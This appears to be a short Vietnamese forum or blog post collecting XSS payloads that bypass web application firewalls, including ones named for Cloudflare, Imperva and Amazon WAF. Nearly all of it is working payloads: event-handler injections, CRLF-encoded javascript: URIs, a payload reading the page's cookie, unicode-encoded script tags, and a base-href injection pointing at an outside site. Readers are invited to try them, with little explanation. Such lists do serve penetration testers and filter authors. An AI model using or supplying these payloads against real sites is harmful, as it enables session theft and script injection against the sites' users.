Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm

Cloudflare XSS Bypass

<img src=x onVector=X-Vector onerror=alert(1)>

XXS Bypass Imperva WAF

(Z("onerror="a=console,a.log`${cookie}`"

Bypass WAF Amazon

<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>

Crlf injection to bypass javascript: Đang bị bờ lách lít

java%0d%0ascript%0d%0a:alert(0)

Trong trường hợp svg onload= bị filter, %0d sẽ đóng vai trò dấu ngăn cách và thỉnh thoảng cũng phá được waf :v.) %0a %0c %09 %00 cũng hay được sử dụng lắm nhé

<svg%0donload=prompt(1)>

Cách này bt không có gì :v

<input onfocus=alert(0) autofocus>

The use of \\ will break out of the quote inside a script tag

\\"-alert(0);//

The WAF blacklisted alert(0), prompt(0), but failed to filter confirm(1) aswell as onmouseenter=. Onmouseneter does the same as onmouseover= but a lot of devs seem to not know this (not sure why) and fail to blacklist it.

"onmouseenter=confirm(1)>

HTML Injection?

<base href=//yoursite.com>

Méo hiểu nổi

%uff1cscript%uff1ealert(1)%uff1c/script%uff1